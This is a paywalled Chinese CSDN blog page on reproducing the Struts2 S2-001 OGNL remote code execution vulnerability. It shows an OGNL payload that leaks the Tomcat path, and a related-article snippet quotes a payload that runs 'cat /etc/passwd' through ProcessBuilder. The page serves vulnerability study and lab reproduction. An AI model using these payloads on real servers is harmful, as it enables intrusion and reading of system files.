复现S2-001远程代码执行漏洞复现

最新推荐文章于 2024-03-14 10:19:36 发布
最新推荐文章于 2024-03-14 10:19:36 发布
阅读量186 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/DXfighting_/article/details/124203002
版权
获取 tomcat 路径:%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}获取网站真实路径:%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#respons
摘要由CSDN通过智能技术生成

获取 tomcat 路径:

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

获取网站真实路径:

最低0.47元/天 解锁文章
DXfighting_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Struts2对应CVE编号记录
ch4nge
08-18 1791
S2-001(CVE-2007-4556) - 远程代码利用表单验证错误 S2-002(无CVE) - <s:url>和<s:a>标记上的跨站点脚本(XSS)漏洞 S2-003(无CVE) - XWork ParameterInterceptors旁路允许OGNL语句执行 S2-004(无CVE) - 提供静态内容时的目录遍历漏洞 S2-005(CVE-2010-1870) - XWork ParameterInterceptors旁路允许远程命令执行 S2-006(CVE-201.
S2-001 远程代码执行漏洞
EC_Carrot的博客
08-05 303
漏洞简介 漏洞复现 执行任意命令: %{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#
S2-001远程代码执行(CVE-2007-4556)
m0_65150886的博客
01-15 504
其全新的Struts 2的体系结构与Struts 1的体系结构差别巨大,其在Action的实现方面线程模型方面、Servlet依赖方面、封装请求参数、表达式语言方面、绑定值到视图技术、类型转换、Action执行控制的对比、拦截器的应用等方面较Struts1进行了较大改进。Struts 2允许用户提交包含 OGNL 表达式字符串的表单数据,若表单验证失败,则服务器会将用户之前提交的OGNL 表达式(如:%{1+1})进行解析执行,然后将结果重新填充到对应的表单数据中。6.6成功获取反弹shell。
struts2框架漏洞复现
Bird&Bird
01-07 4494
目录1、S2-001远程代码执行漏洞(CVE-2007-4556)漏洞简介影响范围漏洞复现S2-005 远程代码执行漏洞(CVE-2010-1870)漏洞简介影响版本绕过过程漏洞复现 1、S2-001远程代码执行漏洞(CVE-2007-4556) 漏洞简介 当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。 影响范围 Struts 2.0.0 - 2.0.8 漏洞复现 输入%{1+1},返回2就是存在该漏洞。 获取
Apache Struts2 | iis6.0的漏洞--目录解析漏洞 | SVN信息泄露漏洞分析 | Bash漏洞分析溯源
weixin_44897902的博客
09-15 667
2.内部文件上传系统漏洞分析溯源(iis6.0的漏洞--目录解析漏洞) 首先进去是这样子,感觉好像很简单,就随便上传一个php文件 然后意料之中的不被允许; 尝试了几次对php文件上传的绕过,发现不行,才发现别人是asp 尝试上传asp文件,发现也不行 图片文件可以,txt文件也可以 抓包回包之后发现服务器是IIS6.0: 垃圾ring才知道iis6.0的漏洞: 文件or目录解析漏洞 详情可...
复现S2-061远程代码执行漏洞
weixin_67813445的博客
03-29 103
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts于2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。
漏洞复现】JDWP远程命令执行漏洞
weixin_43486390的博客
03-02 6326
0x01 漏洞描述 JPDA(Java Platform Debugger Architecture):即Java平台调试体系架构。Java虚拟机设计的专门的API接口供调试和监控虚拟机使用 JPDA按照抽象层次,又分为三层,分别是: JVM TI(Java VM Tool Interface):虚拟机对外暴露的接口,包括debugprofile。 JDI(Java Debug Interface):Java库接口,实现了JDWP协议的客户端,调试器可以用来和远程被调试应用通信。 JDWP(Java
java JDWP调试接口任意命令执行漏洞
tangshuangsss的专栏
12-16 5604
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介JDWP(Java DEbugger Wire Protocol):即Java调试线协议,是一个为Java...
Struts2漏洞S2-001漏洞原理及复现
weixin_73180072的博客
09-09 398
Struts2中允许用户提交包含OGNL表达式字符串的表单数据; 若表单验证失败,服务器会将用户提交的OGNL表达式进行解析执行
struts2s2-001远程代码执行漏洞docker&&vulhub复现
qq_43455259的博客
07-12 1761
struts2s2-001远程代码执行漏洞docker&&vulhub复现
Struts2 远程代码执行漏洞复现S2-001
最新发布
Welcome To Myon'Blog !
03-14 1115
Struts2 是一个基于 MVC 设计模式的 Web 应用框架,作为控制器来建立模型与视图的数据交互。此漏洞源于 Struts 2 框架中的一个标签处理功能:altSyntax。在开启时,支持对标签中的 OGNL 表达式进行解析并执行。Struts 2 的 “altSyntax” 功能允许将 OGNL 表达式插入到文本字符串中并递归处理,这允许恶意用户提交一个字符串,通常通过 HTML 文本字段,其中包含一个 OGNL 表达式(如 %{1+1}),如果表单验证失败,服务器将执行该表达式。
Apache Struts2远程代码执行漏洞(S2-001)复现
oiadkt的博客
05-04 2635
Apache Struts2远程代码执行漏洞(S2-001)复现
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8352
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值